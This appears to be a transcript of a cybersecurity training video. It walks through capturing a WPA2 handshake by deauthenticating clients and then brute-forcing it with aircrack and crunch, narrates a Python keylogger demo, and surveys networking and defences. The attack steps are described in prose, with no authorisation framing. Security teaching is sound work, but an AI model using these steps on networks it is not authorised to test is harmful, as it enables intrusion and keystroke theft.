focus on. This here is supposed to be a client that is connected to one such network. For example, the station that you can see, 5626, this is supposed to be the MAC address of the device that is connected to a router. This BSS ID is supposed to be which Wi-Fi it is connected to. For example, 5895D8 is this one, which is the Geo24 router. So we already know which router has a device connected to it, and we can use our attack to capture this handshake. Now that it has already run for 1 minute, now that we press Ctrl C, we will be asked to select a target. See, it has already selected the number 5, which is the Geo24 router, as the one with clients. So it is easy to run an attack on, and it is easy to capture a handshake for. We select network 5 and we run a capture handshake. It says we have a valid WPA2 network target selected and that the script can continue. Now, to capture the handshake, we have a couple of attacks, a deauth or a deauth air replay attack. What this attack does is kick the clients out of the network. In return, when they try to reconnect to the Wi-Fi, as they are configured that way, that when a client is disconnected, it tries to reconnect it immediately, it tries to capture a handshake file, which in turn contains the security key, which is necessary to initiate the handshake. For our demo, let's go with the second option, that is the deauth air replay attack. Select a timeout value, let's say we give it 60 seconds, and we start the script. We can see it capturing data from the Geo24 network, and here we go. We have the WPA handshake file. Once the handshake file is captured, you can actually close this, and here we go, congratulations. In order to capturing a handshake, it has verified that a PMK ID from the target network has successfully been captured. This is the file that is already stored. It's a .cap file. For the path, we can, let's say we can keep it in a desktop. Okay, we give the path and the handshake file is generated. We can already see a target over here, same Geo24 router with the BSS ID. Now if we return to its main menu, we already have the handshake file captured with us. Now our job is to brute force into that handshake capture file. The capture file is often encrypted with the security key of the Wi-Fi network. If we know how to decrypt it, we will automatically get the security key. So let's go to the offline WPA2 decrypt menu. Since we'll be cracking personal networks, we can go with option 1. Now to run the brute force tool, we have two options. Either we can go with the aircrack or we can go with the hashcat. Let's go with aircrack plus crunch, which is a brute force attack against a handshake file. We can go with option 2. It can already detect the capture file that we have generated. So we select yes. The BSS ID is the one which denotes the Geo24 router. So we're going to select yes as well. the minimum length of the key. For example, it has already checked that the minimum length of a Wi-Fi security key, which is a WPA to PSK key, will always be more than 8 digits and below 64 digits. So we have to select something in between this range. So if we already know, let's say that the password is at least 10 digits, we can go with the minimum length as 10. And as a rough guess, let's say we put the maximum length as 20. The character set that we're going to use for checking the password will affect the time taken to brute force. For example, if we already know that, or we have seen a user use a password while connecting to the router as something that has only numbers and symbols, then we can choose accordingly. Let's say if we go with only uppercase characters and numeric characters, go with option 7, and it's going to start decrypting. So how AirCrack is working right here, you can see this passphrase over here. The first 5 or 6 digits are A. It starts working its way from the end, from the last character. It keeps trying every single combination. You can see the fourth character from the right side, the D. It will eventually turn to E because it keeps checking up every single character from the end. This will keep going on until all the single characters are tested and every single combination is tried out. Since the handshake file is encrypted using the security key, that is the WPA2 key of the router, whichever passphrase is able to decrypt the handshake key completely will be the key of the Wi-Fi router. This is the way we can brute force into Wi-Fi routers anywhere in the world.
The internet is an endless source of information and data. Still, in some cases, we come across some occurrences like cyberattacks, hacking, force entry, which may affect our time on the web. To understand the keylogging problem better, let's take a look at an example. This is June. She works in a business firm where she manages the company's data regularly. This is Jacob from the information department, who is here to inform her about some of the security protocols. During the briefing, she informed him about some of the problems her system was facing with, which included slow reaction speed and unusual internet activity. As Jacob heard about the problems with the system, he thinks of the possibility what could be the reason behind these problems her system was facing with. The conclusion that he came across was the keylogging issue. Unknown to the problem her system was facing with, she asked him about some of the details regarding it. For today's topic, we learn what exactly keyloggers are and how they affect our system, what are the harmful effects that keylogging can bring into the system. For today's agenda, we learn what exactly the keylogging program is. Then we'll see how the system gets infected, what are different methods, how the keylogging issue enter into the system. Then we'll take a look at different types of methods, how to detect the keylogging issue into the system. Then we'll take a look at different types of keyloggers that are present and how they affect differently into the system. Then we'll take a look how the hackers use the recorded data that has been sent by the keylogging program. And then we'll take a look at a case where the mobile devices get affected with the keylogging issue. And lastly, we'll take a look what are different prevention methods available to prevent the system from getting infected by the keylogging issue. To begin with, we'll learn what exactly the keylogging program is. As the name suggests, Keylogger is a malicious program or a tool that is designed to record keystrokes that are typed during data input and record them into a log file. Then the same program secretly sends these log files to its origin, where they can be used for malicious acts by the hacker. Now that we know what the keylogging program is, let's take a look how they enter into the system. Searching for a suitable driver for a system can often lead to the installation of the keylogging program into the system if we often visit suspicious sites and uncertified software are installed into our system. Then, if we use unknown links or visiting unknown websites which come through unknown addresses can also be a reason behind the keylogging issue entering into the system. And lastly, there are often cases where Different pop-ups that we often see on social sites or different media sites can lead to the installation of keylogging program into our system. Now that we know how the problem gets into the system, let's take a look how to identify whether the system is infected by the keylogging issue. The keylogging issue can be identified if there are often cases when our keyboard lags behind the system. The data that we enter sometimes is stuck in between when we type through the input. Then, there are cases when the system freeze occurs unknowingly to what exactly could be the reason behind them. And also there are delayed reaction time for different applications that run on the system. And lastly, there are different cases when we often see suspicious internet activity on the system that we don't know about. This could lead to the identification of a problem into the system. Now, we'll take a look at different types of keyloggers that are present on the net which can harm our system differently. The first problem that keyloggers arouse is API based. The most common keylogging case, which uses APIs to keep a log of the type data and share it to its origin for malicious purposes. Each time we press a key, the keylogger intercepts the signal and logs it. Then we have form grabbing based keyloggers. As the name suggests, they are based keyloggers that store the form data. That is, if we often use web forms or different kinds of forms to enter different data, they can be recorded into the system by the program and sent it to its origin. Then we have kernel-based keyloggers. These keyloggers are installed deeply into the operating system, where they can hide from different antivirus if not checked properly, and they record the data that we type on the keyboard and send it to its origin. And lastly, we have hardware keyloggers. These keyloggers are present directly into the hardware, that is, they are embedded into system where they record the data that we type on the keyboard. Now let's take a look how hackers differentiate different type of recorded data and exploit them. When hackers receive information about the target, they might use it to blackmail the target, which may affect the personal life of the target and also blackmail them for different money-related issues. Then, in case of company data that is recorded by the keylogging program can also affect the economic value of the company in the market, which may lead to the downfall of the company. Also, in some cases, the keylogging program can also log data about military secrets, which may include nuclear codes or security protocols which are necessary to maintain the security of a country. Now, let's take a look whether mobile devices get infected with the keylogging issue or not. In the case of hand devices, infection of keyloggers are low in comparison to the computer systems, as they use on-screen keyboard or virtual keyboard. But in some cases, we often see different kinds of malicious programs getting installed into the hand device if we often visit different uncertified websites or illegal websites or torrent sites. And also, the device that is infected with the keylogging issue or different kind of malicious program can often lead to the exploitation of data that includes photos, emails, or important files by the hacker or the cyber criminal that installed the particular malicious program into the system. Now, to prevent a system from getting infected by the keylogging program, let's take a look at different points. The first point includes using of different antivirus softwares or tools which can prevent the entering of malicious program into the system. Then, keeping system security protocols regularly updated is also a good habit. And lastly, using virtual keyboard to input our sensitive data, which may include bank details, login details, or different passwords related to different websites. Now that we have some understanding about the topic of keyloggers, let's take a look at the demo to further increase the knowledge about the topic. For the first step, we have to download some of the important libraries that are required into the system. which is this library. Now we'll run it. The system says the library is already installed into the system. Now let's take a look what exactly modules are required from the particular library. From this library, we'll import the keyboard module, which will help us to record the data that we type on the keyboard. Now, from the same, we'll also import key module and the listener module, and also the logging module, which will help us to record the data into a log file. For the next part, we'll write a piece of code that will allow us to save the data that is recorded by the program into a text file that will be named as key_log text file along with the date and time stamp. Let's take a look. Now, we'll provide it with the file name that will be given as keylog.txt file, and also show the part where the format of the data is recorded. Put the brackets over here to contain the file name. Now we'll write the format in which the data will be recorded into the log file, which will be given as the format would be the message and the timestamp, which would be given as along with the timestamp given as percentage and ending it with the bracket. Now, for the next step, we'll design two of the functions that will be used into the program that will be termed as while press function and while release function. Let's take a look. While press function would be a function that will come into play when the keyboard key has been pressed is pressed. And this would go for the format that we designed in the above line. And logging the pressed key info, a string file to be recorded into the log file. Now we'll design a function that is while release. That will come into play when the escape key has been pressed. That is, the program will terminate itself and the program will stop from running. And in the end, we require for the functioning of the program to loop these functions, that is while press and while release, to continue its cycle. That will be going for while press and on release will contain while release function as listener. And now this part would join the different threads on Jupyter Notebook and refresh the page. Go to the bottom. Over here, we see the keylog text. That is a text file that we created. Let's open it. And over here, we have the data that is created. As we started with, note, then this is the hello world part that we created just now, which shows that the program we created is working properly.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
Now let's go a little bit further and see what would motivate people for committing such cybercrimes. Right? The first and foremost motive is disrupting business continuity. Others would be looking at data theft or information theft and manipulating that data to gain from that data. So if I'm able to access your computer and steal some data that has some value to you and sell it or make it public, you would be at a financial loss because that data no longer has any value. Creating fear and chaos by disrupting critical infrastructure. For example, a company's infrastructure crashes, the services are no longer being offered by that organization, and people start panicking or start fearing an attack by cybercriminals, and it leads to chaos. Financial loss to the target, which is very obvious. If I do a denial of service attack, or if I make a service unavailable from an organization, what is going to happen is, since that service is not functioning, the company is not going to make any money out of it, and thus going to suffer a financial loss. Achieving states' military objectives, one country spying on another country, trying to gather information about their military intelligence, military activities, or any other activities that can harm the original country. Demanding ransom, hackers can encrypt your data and then demand a ransom from you in lieu of decrypting the data again. Damaging reputation of a target, impersonating a user on the social media platforms, making false statements, thus damaging the reputation of that person, and propagating religious or political beliefs. Religious fanatics, promoting whatever cultures that they want to promote, trying to gain more followers, thus bringing more unrest to the world. Any of these could become motives for cybercrime. So, this is why we want cybersecurity. Cybersecurity should be in place to prevent these kind of attacks. So, what exactly is cybersecurity? It refers to the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access and attacks. So whatever your digital footprint, could it be servers, computers, switches, routers, web servers, web applications that you're hosting over there, services that you're consuming from the cloud or providing to other customers, you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks which could lead to disastrous results. So the main difference we want to understand here is the difference between cybersecurity and information security. Information security is data within the organization where they handle sensitive information or proprietary information, copyrighted or patented information, and they want to secure it from data leaks or having that data in somebody's computer's hands. Cybersecurity is basically a technique used to protect the integrity of networks. So this is when you're going to go on the web and on the internet, you're going to secure your devices that you have deployed, allowing people to access your infrastructure from the outside. So what could be the cost of not being cyber secure? If you get hacked, or if your data is compromised, or if your information is compromised, you could have a lot of repercussions. Your goodwill will go for a toss. You may be open for lawsuits, not only from clients, but from customers as well. You could be open for fines or penalties from government organizations for failing to follow the law of the land. Customer trust will obviously be hampered. If you've been hacked and your data has been compromised, you wouldn't want to deal with that organization in the future. All of this could land the organization in a financial crisis where all the lawsuits and penalties that are being imposed could basically bankrupt that organization and thus take it out of circulation. So now let's look at some basic terminologies which we need to understand to go further in the cybersecurity world. First and foremost, network. What is a network? Network is nothing but a group of interconnected devices. Could be servers, could be workstations, could be laptops, could be any devices, file printers and whatnot to be interconnected with each other. As you can see in the diagram, it is used for communications. It's primarily used for data transmissions and to communicate between various terminals so that the business can go on. It is also used to share data and information. It could be wired or wireless. So you got a wired LAN, or at home we all have wireless networks where we connect all our devices. We use them for streaming videos. We use them to connect to the internet, surf websites, work from home. So we've got office also set up on our Wi-Fi. So a network is nothing but a collection of interconnected devices that are allowed to communicate each other freely so that the business can be continued in a proper manner. Server. Now, server is nothing but a hardware device that is supposed to handle requests of data information, allow network services to function from other computers and devices. So this is where we build a client-server relationship, where on the server we've got the major software, we got the data that is stored over there, and clients that interact with the server to consume that data in a particular manner that would help them make sense and analyze that data and generate business out of them. Then the internet. Internet is nothing but the collection of multiple networks globally. So all the networks that we have across the globe, when they are interconnected with each other, that is what internet is. And if we just go back and we talk about servers, this is what allows the internet to be formed. So every organizations, when they publish their servers on the internet and they allow everyone to interconnect through those servers, that is where the internet comes in, being the servers being the backbone of the internet. Obviously, for the servers to communicate with each other, we will need switches, routers, and other devices for the data transmissions to happen. So these are the multiple networks, could be individual networks, interconnected together would form the internet across the globe. For the internet to work, there would be a set of protocols for transmissions to be allowed across the globe. Now, this is where TCP/IP, or the Transmission Control Protocol over Internet Protocol, comes into the picture. So if you remember, we use communication channels like TCP, or the Transmission Control Protocol, and UDP, User Datagram Protocol. When we connect to web servers, we talk about the HTTP protocol and HTTPS protocol if we want it secure. Then we'll talk about IMAP, POP3, and all of these protocols. Now, where do these protocols come from? It is nothing but a suite of the TCP/IP software which contains all of these protocols which allow computers to communicate with each other. If TCP/IP wouldn't have been there, our network would have collapsed. Now, when we have TCP/IP and we want to communicate across the globe, how would we identify devices on the internet or even on the intranet? Because the devices don't know us. They are not going to use our usernames and passwords to communicate with each other. But when I want to connect to a website or a device, how do I identify it on the intranet or the internet? I obviously use IP addresses. Now, IP addresses are nothing but the internet protocol addresses, which are 32-bit addresses, which look exactly like the one shown on your screen, 172.16.254.1. Now, there is a lot of classification of IP addresses, and some of these IP addresses work on the internet. Some of them are supposed to work on private LANs, but we'll reserve that for a later topic. Then the second way that we are identified on the internet or the intranet are with MAC addresses. So media access controls, or MAC addresses, are hard-coded addresses that are given to our network interface cards. These cannot be modified physically at any point in time. However, there are techniques to spoof MAC addresses, which we can then obfuscate our existing address and give us a new one. That would again be discussed in a later lecture. A router. We've been talking about routers and switches. A router is nothing but a device that passes packets back and forth across networks. It routes the data in the appropriate path. So it is an intelligent device. It can understand IP addresses and MAC addresses. It can identify different paths of reaching a particular network. For example, if I'm sitting in India and I want to communicate across the world to America, there would be a specific path that needs to be followed for my data packet to reach the other side of the world. It is the routers that would map this path, store it in their cache. So when I try to connect to that server, they would retrieve it from the cache and send the packet across the globe. So the home router that we use at home on Wi-Fi is our default gateway to connect to the internet, and thus it allows our internal devices to communicate with each other using internal IP addresses. And when we want to go to the internet, it will then route the traffic on the internet and send the packet to other servers that we want to communicate with. Now, what is a domain? A domain is referred to as a group of computers and other devices that are interconnected and treated as a whole. Now, a domain is used by an organization. So let's say if I am XYZ being the name of the organization, and I want to create a domain which would allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data. I'm going to create a domain for my organization and attach all the devices, create users, and interconnect them using a domain. So this is where you're going to have a centralized approach of a server-client relationship, where you're going to have a main domain and you're going to have devices connected to the domain. Now, when we go onto the internet, the domain name is nothing but the base part of a website name. So when you say google.com and you type it in your browser, you're taken to the web page called google.com, which is the search engine that you're connected. But for Google, the organization, at the other end, they would have a data center over there which would have all that relevant data which allows you to search through that information. So for them, the domain would be the internal part where they have got this cluster of servers creating a data center where all that information is stored. But for us as consumers, a website called google.com would be a domain for us to visit that particular website and consume the services that they're offering on the internet. So here the example is HTTPS, which means that it is a secure website, port 443, and we're connecting to cybersecurity.com. Cybersecurity.com becomes the domain name. HTTPS becomes the protocol that we want to utilize to connect to that particular website. Then we come across DNS, or the domain name system. It is nothing but an index, something like a phone book, which is responsible for mapping the domain name into its corresponding IP address. Now remember, I said that there are only two ways we are identified on the internet or the intranet, either the IP address or the MAC address. If it is devices, if it is computers who are talking to each other, it would obviously be IP addresses. But if I type in google.com, I'm giving it a domain name. The internet does not understand domain names. So there is a DNS, a server, which is an index or works like an index or more like a phone book, which will have a list of all the domains with their corresponding IP addresses. So whenever I type in google.com, the request goes to a DNS server. The DNS server is queried. The IP address of google.com is identified, pasted onto the packet, and then the packet is routed through the router to the path that it has determined to reach the google.com server. Here, replace google.com with cybersecurity.com. So as you can see on the screen, the local PC queries the DNS server. The DNS server replies back with the IP address. Now, if you're wondering how does this work, if we're going to take an example of home networks, the ISP or the internet service provider gives us a default gateway or a router with their own IP addresses for DNS servers and default gateways. So when we try to connect through the router has the IP address of the DNS server and it routes that query to the DNS server. The DNS server replies back with the appropriate IP address. The router then takes that IP address, figures out the path, and sends it across to the targeted server. DHCP, or the Dynamic Host Configuration Protocol. It is a protocol that dynamically assigns IP addresses to the devices in the network. So we have discussed that IP addresses are required by computers to communicate within each other. But who associates or who gives these IP addresses to these computers? So for that to happen, we have got a DHCP server that is created. If you take your home networks, it is the router that has the DHCP role installed on it. So whenever a machine boots up, it sends out a broadcast request looking for the DHCP server, and then there's a communication with the DHCP server. The DHCP server then allocates an IP address to the computer who is requesting it, and once the IP address is allocated, an entry is made in the DHCP server's cache with the corresponding MAC address of that particular machine. Then we come to the next topic called VPN, or a virtual private network. It is a connection between a VPN server and a VPN client. It's basically an encrypted channel that you're creating between two endpoints. And the main reason for a VPN is to encrypt your data so that it is now no longer subject to man-in-the-middle or eavesdropping or modification attacks. So this is a layer of security that you're adding when you're connecting to the internet using an encrypted channel, which should prevent you from getting hacked or your data being compromised by hackers. So as you can see here, and if you remember the previous slides that we have seen, the hacker was able to copy the data very easily. Now that it is an encrypted channel, even if the hacker tries to eavesdrop and capture that data, it will be formatted in such a way that they would not be able to make sense out of it. Now the attacker or the hacker will have to try to decrypt the data. So that's another attack that they'll have to execute to find out the encryption key, decrypt the data, and then look at what the data was. Then we come across botnet. Now let's first understand what bots are. Bots are nothing but the softwares that can be installed on vulnerable machines that would allow the hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do. So most of the botnets are used for distributed denial of service attack. If you remember the DOS and DDoS that we discussed a while back, this is where we tie it up with how they are executed. So a bot master or a hacker, let's call them a hacker, would try to identify vulnerable devices across the internet and try to install the bot onto those devices. The bot essentially is a software that would revert back to the bot master and advertise their availability whenever they have been powered on. A collection of such infected devices would essentially be called a botnet. When there are enough number of machines that the attacker feels are good enough to launch that attack on the targeted servers, the hacker will then initiate those devices, send the commands through the bot master to the bots, and the bots would then generate that kind of traffic, whatever they have been configured for, and then attack the targeted server. Now, this is also done to mask the identity of the hacker. Since the attack is being generated through the botnet, the IP addresses of the botnet computers would be reported to the targeted server, not the actual hacker's IP address. So to figure out who the attacker was would be very much difficult depending on the size of the botnet. So this, you can see, is the attack that has been created over the victims, and the malicious traffic has been generated through the botnet and the victims have been targeted through that. So as said, once that traffic has been done to forensically investigate at the victim's end, they would find the IP addresses of the botnet and not the attacker. Alright, let's start talking about network security controls. Network security controls are nothing but implementations of various devices to enhance the security of a particular network. These could be firewalls, intrusion detection systems, or intrusion prevention systems, honeypots, unified threat management systems, and so on and so forth. The next gen firewalls that we talk about, right? So let's look at a review of what these devices are. Now, a firewall can be a hardware or a software that is responsible for allowing or disallowing a certain amount of traffic to or from your computer. So these are basically created to enhance the security posture of your network, where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed. Now, a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic. You're going to configure the firewall by creating rules based on IP addresses, port numbers, protocols, and what may. And based on this, the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules. And if the traffic is allowed, it will allow the traffic to go through. If there's an explicit rule which says deny the traffic, it will drop the packets or it will delete the packets. It will not allow the packets to go past it. So if it is good traffic, that means it matches a rule that has been created that allows that traffic to go through, the firewall will allow it. If it's bad traffic, that means that there is a rule which denies that traffic to pass through. It will get blocked at the firewall level itself. The firewall will not allow it to enter the network. Similarly, an intrusion detection system. It is designed to detect unauthorized access to systems or intrusion attempts as well. Now, it works along with the firewall, and the main thing is that here there's a database against which it can compare the traffic. So most of the attacks that we have talked about, there are some distinct signatures that would cause concern or that would highlight that kind of an attack. Most of the organizations try to develop these kind of signatures, have them in a database, and store them on the IDS so the IDS can analyze the incoming traffic, look at patterns from the traffic coming in or going out, compare it to the database of the signatures that it has, and if it matches any of the signatures, it will then detect that as an attack and send an alert to the administrator, where the administrator will then have to manually come in and check it out. An intrusion prevention system, as described earlier or as mentioned earlier, can be configured to react to that particular event. So if it detects something that can be classified as an intrusion, an administrator can pre-configure it to react to that particular packet in a particular manner. For example, drop the packets or reflect them to a honeypot, or warn the administrator, or do all of these things at the same time. So as you can see on the diagram, on the internet, there's a hacker, they send some the data packets come in. The firewall is not able to analyze the traffic because a firewall cannot analyze the contents of a packet. It can only look at the header, it can only look at the IP addressing and the ports that have been created, or the rules on which those things have been mentioned. And then it allows the data to go through it reaches the IDS. The IDS then looks at two ways to scan. One is a signature that we've just spoken about, where the developer of the IDS creates those signatures and stores them onto the database, or another thing that is known as heuristic scanning, which is nothing but behavioral scanning. So it looks at the behavior of the data, and if the behavior looks malicious, it will then raise an alert and warn the administrator. Then let's come to honeypots. We just discussed in the previous slide that an IPS or an intrusion prevention system can be pre-configured that if it detects an anomaly or if it detects an intrusion, it may redirect the traffic to a honeypot. What is a honeypot? A honeypot is a decoy system. It is created to showcase a certain set of vulnerabilities to try to attract the attention of an attacker. Now, the word here is used as lure, but it's more to deceive the attacker. For example, if the attacker has been able to bypass your firewall and your IDS and now can scan the entire subnet, when they scan it, they would come across a device which is pretty vulnerable or showcases some vulnerabilities, which would definitely interest the hacker, because they would think that it is a vulnerable server which contains some valuable data. And that's exactly what honeypot is. It's a decoy server trying to act as a production server, trying to showcase that it has some valuable data but also has some vulnerabilities in it, so that the attacker can be attracted towards it and spend some time trying to attack it or analyze the honeypot. At the same time, the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion, which will give the administrator enough time to secure the rest of the network, and will also get to analyze the logs of the honeypot to try to understand what kind of attacks the attacker is trying to create and try to reverse engineer and identify the attacker at the same time. Let's talk about security testing. Security testing is nothing but a method which is carried out to identify threats and loopholes in a system. So here we are going to do a vulnerability analysis and penetration test. We may also go ahead and do a security audit. So what is vulnerability scanning, penetration testing, and security auditing? Vulnerability scanning is the activity which you're conducting to identify or look at possible weaknesses or issues or vulnerabilities or misconfigurations that exist in your infrastructure. So it is a proactive way where a team of security experts will launch a vulnerability scanner, scan certain devices that they have pre-identified, and once the report from the vulnerability scanner comes in, try to analyze the report and make sense out of it to see if there are any vulnerabilities that can be identified on those devices. This is obviously an ongoing process. Why? Because operating systems are patched, upgraded, new versions of softwares are released, and we keep on upgrading and we keep on changing our IT infrastructure ever so often. And hence, the IT infrastructure, like I say, is an ever evolving process. And to be abreast of all the latest vulnerabilities and threats, we need to do the vulnerability analysis in an ongoing manner to identify possible threats to the organization. So then what is penetration testing? Vulnerability analysis is just identifying the vulnerabilities, gaps, misconfigurations that may be in the organization's infrastructure. A penetration test is basically to validate whether those vulnerabilities that have been reported are real. If yes, how complex are they? What would be the impact? And what would be the technological impact, and what kind of data would be compromised, or what would be the end result of that attack if it actually happens in the real world. So here a bunch of ethical hackers would simulate an attack from a hacker's perspective or from an insider's perspective, a malicious outsider or a malicious insider, depending on how they perceive the vulnerability as. And then they will try to test the vulnerability to see how it can be exploited, to what extent it can be exploited, and what would be the compromise or what would be the data leakage that would happen if this vulnerability gets exploited. So there are three ways a penetration test can be conducted. There is a black box testing, a gray box testing, and a white box testing. If you look at black box testing, this is where the tester, or the penetration tester rather, has no knowledge about the organization, their infrastructure, applications, or anything. So this is where you're simulating a hacker who's sitting on the outside, who has no knowledge about the organization. So they start from the information gathering phase, where they're going to try to figure out the IP addresses, the IP ranges, devices, operating systems, applications, and anything and everything that the organization is going to use, and then try to figure out vulnerabilities within them, and then try to attack those vulnerabilities. This is a very time consuming and a cost consuming audit. And the second one is a gray box testing audit, where a partial knowledge is given to the penetration tester. So this simulates a regular user kind of an attack. So let's say if I'm a regular user in an organization And when I say regular user, I'm saying I'm not an administrator. So I have got limited access. And based on that limited access and the limited knowledge that I can gather about the infrastructure by being a regular employee, we are going to simulate a test with that knowledge to see whether an employee can take disadvantage of any vulnerabilities and then try to worm their way into the organization's infrastructure and hack it. The white box testing, on the other hand, is where we're looking at an insider, a malicious insider who already has all the accesses, who already has all the controls in his hand. So simulating an administrative access and then trying to figure out whether this administrator can escalate their privileges and gain some other administrator's access and try to then compromise data. For example, even if I'm saying I'm an administrator, I am not the only administrator in the organization. There would be backup administrators, there would be system administrators, there would be the Active Directory administrators, there would be application administrators, database administrators, and so on and so forth. So every single component that we have may have a different administrator. For example, switches would have a different administrator. Same thing with firewalls or any other security controls that you have. So if I am a administrator for backup, can I then try to worm my way out, escalate my privileges as a regular administrator or a system administrator, and then crack their passwords, try to get access and manipulate some data? So these are the three types of penetration testing audits that you will come across. There would be some different subtypes, but every organization can customize these kind of audits to whatever they require. Then we come to security auditing. Security auditing is nothing but an internal check that is carried out by internal auditors. That means people who are employees within the organization to find out flaws in the organization's information system. Now, this is more on the compliance side. This may take inputs from the vulnerability assessment and the penetration test, but overall we want to see what kind of policies that we have in our organization, whether those policies are working properly, whether they make sense, are there any gaps, and based on the technical inputs from the VAPT team, how do we map with the policies that we have defined for that organization. For example, a password policy. Now we have documented that a password policy should be effective enough that passwords cannot be easily brute forced. So that's a high level policy. Then we dictate a procedure for that policy to be implemented, where we say, hey, we want the systems to be configured where the password meets some complexity standards. For example, should be uppercase and lowercase a through z, 0 through 9, should use special characters, and should be randomized password, should not be dictionary based or based on the user's name. Now, this is the policy that we have created and the procedures that we have defined. Are they being actually implemented in the real world? So a vulnerability analysis would determine whether the passwords are probably weak or not. So if the vulnerability report comes back and says the passwords are probably weak, then a penetration tester would go in and then try various attacks to see if passwords can be compromised. And if yes, they would then look at the complexity of the passwords, compare it to the procedures and the policies. And if they do not match, that's where your security auditing comes into the picture. So you're basically tying up the policy, the procedures, and the actual implementation that you have created in an organization. Now, first and foremost, what is cybersecurity? There are three main pillars of cybersecurity that we deal with since the inception of computers, and they're known as the confidentiality, integrity, and availability triad, also known as CIA. Not to be confused with the American Intelligence Agency, but here we're looking at three different pillars where we want our data to remain confidential, the integrity of that data to be intact, and the data to be made available at all points in time. So let's talk about these three aspects. The principle of confidentiality asserts that the information and functions can be accessed only by authorized parties. So, for example, even if you password protect your file, what is it that you're trying to do? You're trying to prevent other users accessing your data and peeping into your files so that your data remains confidential. It is only shared with people who know the password. Integrity. This is where the trustworthiness of that data comes into the picture, where if the data is going to be changed, for example, you have a spreadsheet which has a lot of information about users and their login activities and whatnot, and you want to ensure that that data is not modified by any unauthorized user. So you're going to verify that the information is correct and is not modified by anybody who's unauthorized. The availability part ensures that this data is made available to all authorized users when and where they want it, right? The principles of availability assert that in systems, functions, and data must be available on demand according to agreed upon parameters based on levels of service. Now, this is where your service level agreements would come in. For example, when we log on to Gmail, we always assume that Gmail is going to work and is going to be available online. At no point in time, or very few times, has it ever occurred that you've gone onto the internet, typed in gmail.com, and the website is not available. In fact, if the website doesn't open, we figure out the internet is not working, right? But Gmail as a service is always made available. Now, when we talk about threats to CIA, the confidentiality, integrity, and availability, we talk about them in two different parameters, cybercrime and hacking. So, what is cybercrime? Cybercrime is any criminal activity or any unauthorized activity that would involve the usage of any computing device which would result as a security incident at the victim's end. Most cybercrimes are carried out in order to profit from them. Criminals would try to do phishing attacks to steal your money out of your bank accounts, or would try to con you into giving out your credentials, thus compromising your email accounts or your social media accounts, and try to gain access to your identity. Cybercrimes are generally carried out against computers or devices directly to damage or disable them, spread malware, steal secret information, etc. So this talks about the motivation part of cybercrimes. What would be the motivational aspect for a person to conduct such an activity, right? So basically to cause damage, like WannaCry happened in 2017. The perpetrators, those used WannaCry, probably gained a lot in the ransom that they demanded for that data to be decrypted, but it also cost the world a lot of money in profits that were lost. Let's move on to tackling cybercrime. So what do we mean by cybercrime? Now again, if you remember a few slides back or a few topics back, we talked about information security and we talked about cybersecurity, and we talked about the difference between both of them. Information security could be about anything, normally contained within the organization, the data that the organization has, and us securing those data by introducing the security controls that we talked about. Cybersecurity would be something that is on the internet or on the web. So any web application that I have deployed on the internet, any databases that I have, that would talk about cybersecurity. So if your Facebook account gets hacked or your OneDrive gets hacked, that's where cybersecurity comes into the picture. But if your physical computer gets hacked because your password got cracked by a physical attack, that's where your information security is. So some of the basic ways of preventing cyber attacks on us. Use unique and strong passwords. We've just discussed the complexity of the passwords. We want to keep them random. They should not be guessable. They should not be based on dictionary words, and they should be randomized in such a way that they cannot be predicted or guessed. The length of the password should be very good. Should at least the minimum, bare minimum should be 8 characters. Even that is not suggested in today's world. It has to be at least 12 to 16 characters. An operating system, I think, in today's world will support up to 24 or 26 characters. If you go into encryption softwares, they support up to 60 odd characters of passwords. So you want to keep those unique. You want to recycle those passwords on a regular basis. You do not want to reuse old passwords again and again. Avoid public Wi-Fi. That's a must. We always look for free Wi-Fi. We go to coffee shops because they advertise free Wi-Fi. That's nowadays a unique selling point for coffee shops and establishments. And we go there, we connect to the Wi-Fi because we get free internet and we get to serve whatever we want. The problem is we have no idea who else is connected to that Wi-Fi and what kind of attacks they are creating. We would discuss Wi-Fi attacks later on in one of the later videos where I can demonstrate how these attacks work. But for now, just remember that public Wi-Fis are very risky. And if your security is not up to the mark, you might just end up getting hacked like nobody's business. Ignore and delete mails from unknown senders. Phishing attacks, very common attacks in today's world. You get an email saying you've won a lottery or you've been chosen for something, or please click here to download your free software and something like that. And those emails are plenty nowadays. I received an email yesterday where there was a Nigerian prince who had died and he had left around $500 million behind, and there was this accountant who wanted to smuggle that money out, and it was a huge email giving me all the details. And out of 7 billion people on this planet, they identified my email address and they wanted to share half the money with me so that they can masquerade the money and avoid paying taxes, inheritance taxes and whatnot. It was a ridiculous scheme. I mean, being chosen out of 7 billion, 1 out of 7 billion, I mean, our luck can't be that good, can it? So you have to be wary about these attacks. Always ask the question, if you won a lottery, did you purchase the ticket? No. So there's never a free lunch, right? So always keep on questioning the things that you've been getting. I'm not saying ignore them, because some of them may actually come true. There's always that 1% hope, but always investigate those things to see whether they are spam, if there is a fraud going on, and if yes, you yourself can communicate with the law enforcement agency and try to figure out who is responsible for that fraud. Make use of antivirus software and always keep it updated. Again, let's not go for the free antivirus softwares because they may be good at detecting infections, but when they come for disinfecting those files, then that's where they ask for money, and that's when you're going to run around and say, okay, let me see which is a very good antivirus to disinfect this kind of a infection. So there are a lot of antiviruses out there, I know that, and it's very confusing which is the best one today. Now the problem is whichever is the best one in the market may not be the best one for the operating system that you're using. For example, I mean, there would be a good antivirus for Windows 7, but the same antivirus installed on Windows 8 or Windows 10 wouldn't be that effective. So always do an investigation. The best way to look at antiviruses and identifying which antivirus suits you is to investigate that antivirus and see the detection rate of that antivirus. See how often does it detect the infections that you're looking at. What you can do is you can head on to a website called virustotal.com. That's virustotal.com. It's a Google owned website. They have around 60 to 70 odd scanners on that website. Most of the known antivirus scanners are there. Try to figure out, try to see if you can get hold of an infected file. Be very careful, you don't want to get infected yourself, or your computer. You can upload it to that particular website and analyze that file and see which antivirus detects those kind of viruses. A few files, a few infections over here and there, and you will come to know which antiviruses would work for you. Use multi-factor authentication or two-step processes for authentication. Just don't rely on a username and password. Register devices, get OTPs either on your email or on your devices. That gives you an added layer of security. If your password gets compromised, that's still okay because now the hacker will need to simulate your 